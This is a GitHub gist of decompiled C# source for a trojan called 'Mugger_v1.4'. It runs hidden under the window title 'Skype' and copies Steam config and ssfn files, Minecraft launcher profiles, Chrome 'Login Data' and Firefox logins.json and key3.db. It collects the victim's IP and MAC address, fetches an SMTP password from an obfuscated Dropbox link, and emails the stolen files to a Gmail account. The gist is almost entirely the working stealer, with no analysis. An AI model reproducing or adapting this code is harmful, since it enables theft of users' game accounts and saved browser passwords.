Skip to content

Instantly share code, notes, and snippets.

@Flakebi

Flakebi/gist:59057b122ba912d8887e Secret

Created June 25, 2015 17:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Flakebi/59057b122ba912d8887e to your computer and use it in GitHub Desktop.
Save Flakebi/59057b122ba912d8887e to your computer and use it in GitHub Desktop.
Download ZIP
C# decompiled trojan
Raw
gistfile1.cs
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Net.NetworkInformation;
using System.Runtime.CompilerServices;
using System.Text.RegularExpressions;
using System.Threading;
using System.Timers;
using System.Windows.Forms;
using WIN3.My;
namespace WIN3
{
[DesignerGenerated]
public class Form1 : Form
{
//
// Properties
//
internal virtual ListBox ListBox1
{
[DebuggerNonUserCode]
get
{
return this._ListBox1;
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.Synchronized)]
set
{
this._ListBox1 = value;
}
}
internal virtual RichTextBox RichTextBox1
{
[DebuggerNonUserCode]
get
{
return this._RichTextBox1;
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.Synchronized)]
set
{
EventHandler value2 = new EventHandler(this.RichTextBox1_TextChanged);
bool flag = this._RichTextBox1 != null;
if (flag)
{
this._RichTextBox1.TextChanged -= value2;
}
this._RichTextBox1 = value;
flag = (this._RichTextBox1 != null);
if (flag)
{
this._RichTextBox1.TextChanged += value2;
}
}
}
private virtual Timer time1
{
[DebuggerNonUserCode]
get
{
return this._time1;
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.Synchronized)]
set
{
ElapsedEventHandler value2 = new ElapsedEventHandler(this.Timer1);
bool flag = this._time1 != null;
if (flag)
{
this._time1.Elapsed -= value2;
}
this._time1 = value;
flag = (this._time1 != null);
if (flag)
{
this._time1.Elapsed += value2;
}
}
}
internal virtual Timer Timer2
{
[DebuggerNonUserCode]
get
{
return this._Timer2;
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.Synchronized)]
set
{
EventHandler value2 = new EventHandler(this.Timer2_Tick);
bool flag = this._Timer2 != null;
if (flag)
{
this._Timer2.Tick -= value2;
}
this._Timer2 = value;
flag = (this._Timer2 != null);
if (flag)
{
this._Timer2.Tick += value2;
}
}
}
//
// Constructors
//
[DebuggerNonUserCode]
static Form1()
{
// Note: this type is marked as 'beforefieldinit'.
Form1.__ENCList = new List<WeakReference>();
}
[DebuggerNonUserCode]
public Form1()
{
base.Load += new EventHandler(this.Form1_Load);
Form1.__ENCAddToList(this);
this.InitializeComponent();
}
//
// Static Methods
//
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
List<WeakReference> _ENCList = Form1.__ENCList;
bool flag = false;
checked
{
try
{
Monitor.Enter(_ENCList, ref flag);
bool flag2 = Form1.__ENCList.Count == Form1.__ENCList.Capacity;
if (flag2)
{
int num = 0;
int arg_44_0 = 0;
int num2 = Form1.__ENCList.Count - 1;
int num3 = arg_44_0;
while (true)
{
int arg_95_0 = num3;
int num4 = num2;
if (arg_95_0 > num4)
{
break;
}
WeakReference weakReference = Form1.__ENCList[num3];
flag2 = weakReference.IsAlive;
if (flag2)
{
bool flag3 = num3 != num;
if (flag3)
{
Form1.__ENCList[num] = Form1.__ENCList[num3];
}
num++;
}
num3++;
}
Form1.__ENCList.RemoveRange(num, Form1.__ENCList.Count - num);
Form1.__ENCList.Capacity = Form1.__ENCList.Count;
}
Form1.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
finally
{
bool flag3 = flag;
if (flag3)
{
Monitor.Exit(_ENCList);
}
}
}
}
//
// Methods
//
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
bool flag = disposing && this.components != null;
if (flag)
{
this.components.Dispose();
}
}
finally
{
base.Dispose(disposing);
}
}
private void Form1_Load(object sender, EventArgs e)
{
int num2;
int num3;
try
{
IL_01:
int num = 1;
string oSFullName = MyProject.Computer.Info.OSFullName;
IL_15:
num = 2;
string text = Conversions.ToString(DateTime.Now);
IL_24:
num = 3;
bool flag = "sdsdsd".Length == 4;
if (flag)
{
}
IL_3A:
IL_3B:
num = 5;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_51:
IL_52:
num = 7;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_68:
IL_69:
num = 9;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_80:
IL_81:
num = 11;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_98:
IL_99:
num = 13;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_B0:
IL_B1:
num = 15;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_C8:
IL_C9:
num = 17;
this.Hide();
IL_D4:
num = 18;
this.ShowIcon = false;
IL_E0:
num = 19;
this.ShowInTaskbar = false;
IL_EC:
num = 20;
string str = Strings.Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3);
IL_100:
num = 21;
string userName = Environment.UserName;
IL_10B:
num = 22;
string temp = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
IL_125:
num = 23;
this.Timer2.Start();
IL_135:
num = 24;
MailMessage mailMessage = new MailMessage();
IL_140:
num = 25;
bool flag2 = false;
IL_147:
num = 26;
bool flag3 = false;
IL_14E:
num = 27;
bool flag4 = false;
IL_155:
num = 28;
bool flag5 = true;
IL_15C:
num = 29;
bool flag6 = false;
IL_163:
num = 30;
IL_16A:
num = 31;
IL_171:
num = 32;
bool flag7 = false;
IL_178:
num = 33;
string text2 = MyProject.Computer.Info.GetType().GUID.ToString();
IL_1A1:
num = 34;
string text3 = MyProject.Computer.Ports.SerialPortNames.Count.ToString();
IL_1C4:
num = 35;
string text4 = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\Software\Wow6432Node\Valve\Steam", "Installpath", null));
IL_1E9:
ProjectData.ClearProjectError();
num2 = -2;
IL_1F2:
num = 37;
File.Copy(text4 + "\config\Config.vdf", temp + "\Config.vdf");
IL_214:
num = 38;
File.Copy(text4 + "\config\SteamAppData.vdf", temp + "\SteamAppData.vdf");
IL_236:
num = 39;
File.Copy(text4 + "\config\Loginusers.vdf", temp + "\Loginusers.vdf");
IL_258:
ProjectData.ClearProjectError();
num2 = -3;
IL_261:
num = 41;
DirectoryInfo directoryInfo = new DirectoryInfo(text4);
IL_26E:
num = 42;
FileInfo[] files = directoryInfo.GetFiles("ssfn*");
IL_280:
num = 43;
FileInfo[] array = files;
int i = 0;
checked
{
while (i < array.Length)
{
FileInfo fileInfo = array[i];
IL_297:
ProjectData.ClearProjectError();
num2 = -4;
IL_2A0:
num = 45;
File.Copy(text4 + "\" + fileInfo.Name, temp + "\" + fileInfo.Name);
IL_2D0:
num = 46;
Attachment item = new Attachment(temp + "\" + fileInfo.Name);
IL_2EE:
num = 47;
mailMessage.Attachments.Add(item);
IL_301:
num = 48;
flag = Directory.Exists(str + "Program Files(x86)\Steam");
if (flag)
{
IL_31C:
num = 49;
flag2 = true;
}
IL_323:
i++;
IL_32A:
num = 51;
}
IL_340:
ProjectData.ClearProjectError();
num2 = -5;
IL_349:
num = 53;
Attachment item2 = new Attachment(temp + "\Config.vdf");
IL_360:
num = 54;
Attachment item3 = new Attachment(temp + "\SteamAppData.vdf");
IL_377:
num = 55;
Attachment item4 = new Attachment(temp + "\Loginusers.vdf");
IL_38E:
num = 56;
mailMessage.Attachments.Add(item2);
IL_3A1:
num = 57;
mailMessage.Attachments.Add(item3);
IL_3B4:
num = 58;
mailMessage.Attachments.Add(item4);
IL_3C7:
ProjectData.ClearProjectError();
num2 = -6;
IL_3D0:
num = 60;
flag = File.Exists(str + "Users\" + Environment.UserName + "\AppData\Roaming\.minecraft\launcher_profiles.json");
if (!flag)
{
goto IL_452;
}
IL_3F5:
num = 61;
File.Copy(str + "Users\" + Environment.UserName + "\AppData\Roaming\.minecraft\launcher_profiles.json", temp + "\launcher_profiles.json");
IL_421:
num = 62;
Attachment item5 = new Attachment(temp + "\launcher_profiles.json");
IL_438:
num = 63;
mailMessage.Attachments.Add(item5);
IL_44B:
num = 64;
flag4 = true;
IL_452:
IL_453:
ProjectData.ClearProjectError();
num2 = -7;
IL_45C:
num = 67;
IL_467:
num = 68;
flag = Directory.Exists(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default");
if (!flag)
{
goto IL_535;
}
IL_48C:
num = 69;
bool flag8 = File.Exists(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data");
if (!flag8)
{
goto IL_532;
}
IL_4B1:
num = 70;
File.Decrypt(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data");
IL_4CE:
num = 71;
File.Copy(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data", temp + "\Login Data");
IL_4F7:
num = 72;
Attachment item6 = new Attachment(temp + "\Login Data");
IL_50E:
num = 73;
mailMessage.Attachments.Add(item6);
IL_521:
num = 74;
flag6 = true;
IL_528:
num = 75;
Tz87fA.GetChrome();
IL_532:
IL_533:
goto IL_53A;
IL_535:
num = 78;
IL_53A:
IL_53B:
ProjectData.ClearProjectError();
num2 = -8;
IL_544:
num = 81;
string path = str + "Users\" + userName + "\AppData\Roaming\Mozilla\Firefox\Profiles";
IL_55D:
ProjectData.ClearProjectError();
num2 = -9;
IL_566:
num = 83;
string[] directories = Directory.GetDirectories(path, "*.default", SearchOption.TopDirectoryOnly);
IL_579:
num = 84;
string[] array2 = directories;
int j = 0;
while (j < array2.Length)
{
string str2 = array2[j];
IL_590:
num = 85;
File.Copy(str2 + "\logins.json", temp + "\logins.json");
IL_5B2:
num = 86;
File.Copy(str2 + "\key3.db", temp + "\key3.db");
IL_5D4:
num = 87;
Attachment item7 = new Attachment(temp + "\key3.db");
IL_5EA:
num = 88;
Attachment item8 = new Attachment(temp + "\logins.json");
IL_601:
num = 89;
mailMessage.Attachments.Add(item7);
IL_613:
num = 90;
mailMessage.Attachments.Add(item8);
IL_626:
num = 91;
flag8 = File.Exists(str2 + "\logins.json");
if (flag8)
{
IL_641:
num = 92;
flag3 = true;
}
IL_648:
j++;
IL_64F:
num = 94;
}
IL_665:
num = 95;
NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces();
IL_670:
num = 96;
string text5 = allNetworkInterfaces[1].GetPhysicalAddress().ToString();
IL_684:
ProjectData.ClearProjectError();
num2 = -10;
IL_68D:
num = 98;
WebClient webClient = new WebClient();
IL_698:
num = 99;
string input = webClient.DownloadString("http://whatismyipaddress.com/");
IL_6AA:
num = 100;
Match match = Regex.Match(input, "href="[/]{0,}whatismyipaddress.com[/]ip[/](.{0,}?)"");
IL_6BC:
num = 101;
string value = match.Groups[1].Value;
IL_6D4:
num = 102;
string str3 = Strings.Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3);
IL_6E8:
num = 103;
flag8 = Directory.Exists(str3 + "Program Files\MalwareBytes Anti Exploit");
if (!flag8)
{
goto IL_70A;
}
IL_703:
num = 104;
bool flag9 = true;
IL_70A:
IL_70B:
num = 106;
string text6 = "https://www.dropbox.com";
IL_716:
num = 107;
IL_721:
num = 108;
string text7 = "/s/";
IL_72C:
num = 109;
string text8 = "yl1q28t";
IL_737:
num = 110;
string text9 = "28n";
IL_742:
num = 111;
string text10 = "mwn2p";
IL_74D:
num = 112;
string text11 = "/PW.txt";
IL_758:
num = 113;
string text12 = "?dl=1";
IL_763:
num = 114;
IL_76E:
num = 115;
IL_779:
num = 116;
IL_784:
num = 117;
IL_78F:
num = 118;
IL_79A:
num = 119;
IL_7A5:
num = 120;
IL_7B0:
ProjectData.ClearProjectError();
num2 = -11;
IL_7B9:
num = 122;
WebClient webClient2 = new WebClient();
IL_7C4:
num = 123;
StreamReader streamReader = new StreamReader(webClient2.OpenRead(string.Concat(new string[] {
text6,
text7,
text8,
text10,
text9,
text11,
text12
})));
IL_816:
num = 124;
flag8 = !flag7;
if (!flag8)
{
goto IL_9FB;
}
IL_828:
ProjectData.ClearProjectError();
num2 = -12;
IL_831:
num = 126;
SmtpClient smtpClient = new SmtpClient("smtp.gmail.com");
IL_841:
num = 127;
mailMessage.From = new MailAddress("jasonmare6@gmail.com");
IL_857:
num = 128;
mailMessage.To.Add("jasonmare111@gmail.com");
IL_870:
num = 129;
mailMessage.Subject = "[User- " + Environment.UserName + "] - [Mugger_v1.4] " + Conversions.ToString(DateTime.Now);
IL_89D:
num = 130;
mailMessage.Body = string.Concat(new string[] {
"==Mugger==
UserIP: ",
value,
"
UserMacaddress:",
text5,
"
SteamStuff Found? = ",
flag2.ToString(),
"
Firefox collected? = ",
flag3.ToString(),
"
Chrome Detected? = ",
flag6.ToString(),
"
",
oSFullName,
"
",
text,
"
",
text2,
"
MineCraft Found? = ",
flag4.ToString(),
"
MalwareBytes Detected?= ",
flag9.ToString(),
"
ChromeData:
",
this.RichTextBox1.Text
});
IL_9A6:
num = 131;
smtpClient.Port = 587;
IL_9BA:
num = 132;
smtpClient.Credentials = new NetworkCredential("jasonmare6@gmail.com", streamReader.ReadToEnd());
IL_9DA:
num = 133;
smtpClient.EnableSsl = true;
IL_9EA:
num = 134;
smtpClient.Send(mailMessage);
IL_9FB:
IL_9FC:
num = 136;
flag8 = flag5;
if (flag8)
{
}
IL_A0B:
IL_A0C:
num = 138;
this.Timer2.Start();
IL_A1F:
goto IL_CB1;
IL_A28:;
}
int arg_A2F_0 = num3 + 1;
num3 = 0;
switch(ICSharpCode.Decompiler.ILAst.ILLabel[], arg_A2F_0);
IL_C64:
goto IL_CA6;
num3 = num;
switch(ICSharpCode.Decompiler.ILAst.ILLabel[], (num2 > -2) ? num2 : 1);
IL_C82:
goto IL_CA6;
}
object arg_C84_0;
endfilter(arg_C84_0 is Exception & num2 > 0 & num3 == 0);
IL_CA6:
throw ProjectData.CreateProjectError(-2146828237);
IL_CB1:
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = new Container();
this.Timer2 = new Timer(this.components);
this.ListBox1 = new ListBox();
this.RichTextBox1 = new RichTextBox();
this.SuspendLayout();
this.Timer2.Interval = 9000;
this.ListBox1.FormattingEnabled = true;
Control arg_6D_0 = this.ListBox1;
Point location = new Point(0, 51);
arg_6D_0.Location = location;
this.ListBox1.Name = "ListBox1";
Control arg_97_0 = this.ListBox1;
Size size = new Size(120, 95);
arg_97_0.Size = size;
this.ListBox1.TabIndex = 0;
Control arg_BD_0 = this.RichTextBox1;
location = new Point(126, 12);
arg_BD_0.Location = location;
this.RichTextBox1.Name = "RichTextBox1";
Control arg_ED_0 = this.RichTextBox1;
size = new Size(286, 231);
arg_ED_0.Size = size;
this.RichTextBox1.TabIndex = 1;
this.RichTextBox1.Text = "";
SizeF autoScaleDimensions = new SizeF(6, 13);
this.AutoScaleDimensions = autoScaleDimensions;
this.AutoScaleMode = AutoScaleMode.Font;
size = new Size(424, 255);
this.ClientSize = size;
this.Controls.Add(this.RichTextBox1);
this.Controls.Add(this.ListBox1);
this.Name = "Form1";
this.Text = "Skype";
this.ResumeLayout(false);
}
private void RichTextBox1_TextChanged(object sender, EventArgs e)
{
}
private void Timer1(object obj, ElapsedEventArgs ti)
{
}
private void Timer2_Tick(object sender, EventArgs e)
{
bool isAttached = Debugger.IsAttached;
if (isAttached)
{
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment